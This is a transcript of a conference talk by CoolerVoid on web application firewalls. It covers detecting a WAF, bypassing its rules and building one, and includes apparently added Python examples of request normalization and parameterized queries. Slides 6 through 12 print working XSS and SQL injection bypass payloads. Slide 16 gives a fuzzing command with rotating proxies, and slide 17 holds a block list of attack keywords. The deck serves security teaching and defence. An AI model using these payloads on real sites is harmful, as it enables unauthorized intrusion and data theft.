
Web Application firewall tricks and tips

CoolerVoid
September 27, 2021


Web Application firewall tricks and tips.

* How you can develop your WAF
* How to bypass any WAF


Transcript

  1. Whoami
     • Antonio Costa aka Cooler_
     • Projects: Github.com/CoolerVoid
     • Contact: [email protected]
     • Cyber security engineer
     • Programmer/developer
     • 13 years of work experience with pentest, code review, development, incident detection, incident response and hardening.
  2. Other resources for rules
     • Block per IP address
     • Leak mitigation (responses)
     • Insert anti-CSRF tokens
     • Detect User-Agent anomalies
     • Strong blocklist
     • Denial of service
     • Force hardening in custom endpoints: headers HSTS, anti-XSS, CSP, nosniff…
     • Insert cookie attributes: HttpOnly, Secure...
  3. Practical point of view
     • Detecting the type of WAF
     • Common attacks against WAFs
     • Custom attacks to bypass a WAF
     • Attack mitigation in the WAF
     • Attack mitigation in the application
     • Create your custom WAF
     • My open source projects
     • Attack and protection!
  4. Detection
     • You can search for a pattern in cookies, response headers… Each WAF has a different context in its response.
     • https://svn.nmap.org/nmap/scripts/http-waf-detect.nse
     • https://github.com/sandrogauci/wafw00f
     • http://code.google.com/p/imperva-detect/
  5. Common attacks
     • WAFs can be configured to actively block requests and traffic that violate the WAF rule-sets. This is a useful feature, but it needs to be used judiciously: a WAF in over-active blocking mode prevents legitimate traffic from reaching the web server, making the application unusable.
     • Sometimes the rules are weak and don't match the attacks they are supposed to block.
  6. Mixed case
     • A cool trick to bypass a common rule is mixed case; the purpose is to take advantage of rules that only match one letter case (no case-insensitive matching).
     • SELECT, SeLect, selEcT… UnIOn, unIoN...
     • Look at the following:
     • /sell/cars.php?search=<script>alert(document.cookie)</script>
     • /sell/cars.php?search=<SCripT>AlErt(DoCuMenT.cOoKie)</scrIpt>
  7. Replace keywords
     • Replacing keywords is a common function in WAFs; this resource erases critical points in attacks, but you can bypass it if you find a point to insert the attack word inside the payload.
     • Look at the following (the WAF strips the inner lowercase keyword from the first request, leaving the second):
     • /cars_show.php?car_id=-30 UNIunionON SELselectECT 6,7,8,9
     • /cars_show.php?car_id=-30 UNION SELECT 6,7,8,9
  8. Spaces to comments
     • Replacing spaces with comments is a very good way to bypass a WAF.
     • Look at the following:
     • /sell/cars.php?search=id=1+UnIoN/*&a=*/SeLeCT/*&a=*/ 1,2,3,database()-- -
     • /sell/cars.php?search=id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- -
  9. Encode abuse
     • Another trick to bypass is abusing encoding; sometimes the application renders encoded strings...
     • Look at the following: <script>alert(document.cookie)</script>
     • URL encode: %3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
     • Base64 encode: PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ=
  10. Buffer overflow
     • When the WAF service doesn't validate its inputs properly, you can see this problem in fuzzing tests...
     • Look at the following:
     • /cars/id/page/=-25+and+(select 2)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...)+/*!UnIOn*/+/*!selECt*/+4,5,6,7…
     • id=2 and (select 2)=(Select 0xAAAAAAAAAAAAAAAAAAAAA...)+uNIoN+seLecT+2,3,version()...
  11. HTTP Parameter Pollution (HPP)
     • The following request doesn't allow anyone to conduct an attack:
     • /?id=1;select+4,5,6+from+users+where+id=1--
     • This request will be performed successfully using HPP:
     • /?id=1;select+4&id=5,6+from+users+where+id=1--
     • Successful conduction of an HPP attack bypassing a WAF depends on the environment of the application being attacked.
  12. Using HTTP Parameter Fragmentation (HPF)
     • execute_query("select * from table where a=".input_a." and b=".input_b);
     • execute_query("select * from table where a=".input_a." and b=".input_b." limit ".input_c);
     • The following request doesn't allow anyone to conduct an attack:
     • /?a=1+union+select+1,2/*
     • These requests are a possible attack using HPF:
     • /?a=1+union/*&b=*/select+1,2
     • /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
     • The SQL requests become:
     • select * from table where a=1 union/* and b=*/select 1,2
     • select * from table where a=1 union/* and b=*/select 1,pass/*limit */from users--
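The tricks in slides 6 through 12 all rely on the rule engine matching the raw bytes it receives: a different letter case, a keyword hidden inside another keyword, a comment in place of a space, an extra encoding layer, or a payload split across parameters. The following Python is an added example, not code from the deck or from the author's projects, showing the defensive counterpart: canonicalize each value before matching (bounded URL decoding, lower-casing, comment handling that keeps MySQL `/*!...*/` bodies as code), strip keywords to a fixpoint instead of in one pass, flag oversized values (the fuzzing case of slide 10), and inspect the joined parameter values as well as each one alone so that HPP and HPF fragments are seen reassembled. The keyword list, the `MAX_VALUE_LEN` bound, the `,` join and all function names are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Single-keyword signatures (constructed list for this example; a real rule set is larger).
KEYWORDS = ("union", "select", "from", "where", "database(", "concat(", "<script", "alert(")
KEYWORD_RE = re.compile("|".join(re.escape(k) for k in KEYWORDS), re.IGNORECASE)

# Multi-token signatures; they only fire once the fragments are adjacent again.
SEQUENCE_RES = {
    "union-select": re.compile(r"\bunion\s+select\b"),
    "select-from": re.compile(r"\bselect\b.*\bfrom\b"),
}

MAX_VALUE_LEN = 1024  # constructed bound; longer values are flagged instead of being parsed further


def decode_fully(value, max_rounds=3):
    """Undo URL encoding until the string stops changing (bounded, so %2525... cannot loop forever)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalize(value):
    """Canonical form used for matching: decoded, lower-cased, comments resolved, whitespace collapsed."""
    value = decode_fully(value).lower()
    # MySQL executes the body of /*!...*/, so it is kept as code rather than discarded.
    value = re.sub(r"/\*!(.*?)\*/", r" \1 ", value, flags=re.DOTALL)
    # An ordinary /*...*/ comment is whitespace to the database, so it becomes one space.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.DOTALL)
    return re.sub(r"\s+", " ", value).strip()


def hits_in(canonical):
    """Keywords present in an already-normalized string."""
    return sorted({m.group(0) for m in KEYWORD_RE.finditer(canonical)})


def keyword_hits(value):
    """Keywords present once the mixed-case, comment and encoding disguises are removed."""
    return hits_in(normalize(value))


def strip_keywords_once(value):
    """Single-pass removal, the weakness of slide 7: 'UNIunionON' loses the inner 'union' and becomes 'UNION'."""
    return KEYWORD_RE.sub("", value)


def strip_keywords_fixpoint(value, max_rounds=10):
    """Repeat removal until nothing changes; still weaker than rejecting the request outright."""
    for _ in range(max_rounds):
        stripped = KEYWORD_RE.sub("", value)
        if stripped == value:
            break
        value = stripped
    return value


def inspect_request(url):
    """Inspect each parameter on its own and all values joined, which is what HPP and HPF exploit."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True, separator="&")
    names = [name for name, _ in params]
    duplicates = sorted({n for n in names if names.count(n) > 1})
    oversized = [name for name, value in params if len(value) > MAX_VALUE_LEN]
    per_param = {}
    per_param_sequences = set()
    for name, value in params:
        canonical = normalize(value)
        per_param.setdefault(name, set()).update(hits_in(canonical))
        per_param_sequences.update(k for k, rx in SEQUENCE_RES.items() if rx.search(canonical))
    # Backends differ in how repeated or neighbouring values end up inside the query (the deck
    # notes this depends on the environment); joining with "," models a concatenating backend.
    joined = normalize(",".join(value for _, value in params))
    return {
        "duplicates": duplicates,
        "oversized": oversized,
        "per_param": {k: sorted(v) for k, v in per_param.items()},
        "per_param_sequences": sorted(per_param_sequences),
        "joined": joined,
        "sequences": sorted(k for k, rx in SEQUENCE_RES.items() if rx.search(joined)),
    }


if __name__ == "__main__":
    for url in ("/?id=1;select+4&id=5,6+from+users+where+id=1--", "/?a=1+union/*&b=*/select+1,2"):
        print(url, inspect_request(url))
```

Joining with `,` models one concatenating backend; as the deck says, the real reassembly depends on the environment, so a WAF in front of an unknown application should treat repeated parameter names as a finding in their own right rather than guess the join. Keyword stripping is included only to make the single-pass defect visible; blocking on a hit is the better outcome.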
  13. Time machine
     • Random delay on each request
     • Random User-Agent per request
     • Random IP address per request (proxy)
     • Bypass intrusion prevention systems (IPS) and web application firewalls (WAF)
  14. Automate
     • Project to transform your list of payloads using a lot of techniques to help bypass a WAF.
     • https://github.com/CoolerVoid/payloadmask
  15. Fuzzing / Brute
     • 0d1n is a tool for automating customized attacks against web applications.
     • Open source
     • Uses a thread pool
     • Github.com/CoolerVoid/0d1n
  16. Fuzzing / Brute
     • 0d1n --host http://localhost/test.php --post "car_name_search=^" --payloads payloads/xss.txt --find_regex_list payloads/guess.txt --log name_log --save_response --tamper urlencode -proxy-rand payloads/proxy.txt
  17. Application mitigations
     • Validation and proper sanitization (remove DOM, JS, HTML…).
     • Prepared statements (with parameterized queries).
     • Create a function that checks a block list of common words used in attacks (eval, timeout, union, --, select, delete, version, benchmark, sleep, /**/...); set the whole string to lower case before scanning for patterns.
     • Study your ORM (SQLAlchemy, Hibernate...) to prevent pitfalls in its resources.
     • Follow MITRE and OWASP guidance on hardening, etc.
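The `execute_query("select * from table where a=".input_a ...)` pattern from slide 12 and the "prepared statements" item above, side by side, as an added Python example (not code from the deck or from the author's projects): the concatenated version hands the parameter to the SQL parser, the parameterized version binds it as a value that can only be compared, and a validation step in front of it refuses anything that is not an id at all. The `cars` table, its rows and the function names are constructed for this example.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the deck's cars endpoint."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cars (id INTEGER PRIMARY KEY, name TEXT, owner_email TEXT)")
    conn.executemany(
        "INSERT INTO cars (id, name, owner_email) VALUES (?, ?, ?)",
        [
            (1, "roadster", "alice@example.invalid"),
            (2, "wagon", "bob@example.invalid"),
            (3, "pickup", "carol@example.invalid"),
        ],
    )
    return conn


def find_car_concatenated(conn, car_id):
    """The slide-12 pattern: the value is glued into the SQL text, so the database parses it as SQL."""
    query = "SELECT id, name FROM cars WHERE id = " + car_id
    return conn.execute(query).fetchall()


def find_car_parameterized(conn, car_id):
    """Prepared statement: the driver binds the value after parsing, so it is only ever compared."""
    return conn.execute("SELECT id, name FROM cars WHERE id = ?", (car_id,)).fetchall()


def find_car_validated(conn, car_id):
    """Validation in front of the prepared statement: an id must be a positive integer or the request is refused."""
    if not car_id.isdigit():
        raise ValueError("car_id must be a positive integer")
    return conn.execute("SELECT id, name FROM cars WHERE id = ?", (int(car_id),)).fetchall()


def rejected(conn, car_id):
    """True when validation refuses the value before any SQL runs."""
    try:
        find_car_validated(conn, car_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    for value in ("2", "0 OR 1=1"):
        print(repr(value), find_car_concatenated(db, value), find_car_parameterized(db, value), rejected(db, value))
```

With a bound parameter, SQLite compares the integer column against the text `'0 OR 1=1'` and finds no row, which is the behaviour to expect from any driver that separates query text from data; the block list of the slide above is a second line of defence in front of this, not a replacement for it.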
  18. Create your WAF
     • Study five years around sockets and raw sockets
     • Demultiplexer problems (select(), epoll(), kqueue(), pthreads, MPI…)
     • Race conditions
     • Testing a long list of libraries: libuv (used by Node), libevent (old lib for the core of nginx), Python Twisted
  19. Create your WAF
     • WAF from scratch: RaptorWAF
     • Demultiplexer uses select() with pthreads
     • Has a problem: race conditions with millions of connections (locking with a mutex cannot save it).
     • Easy to understand
     • Github.com/CoolerVoid/RaptorWAF
  20. Create your WAF
     • Pthread tests
     • Libevent study
     • Lighttpd core study
     • The big journey...
  21. Create your WAF
     • OctopusWAF
     • Uses libevent
     • Has support for heavy connection loads
     • Uses libinjection to detect SQLi
     • Github.com/CoolerVoid/OctopusWAF
  22. Detections
     • Machine learning
     • Natural language
     • AI
     • Score based
     • Uploads (binary checks)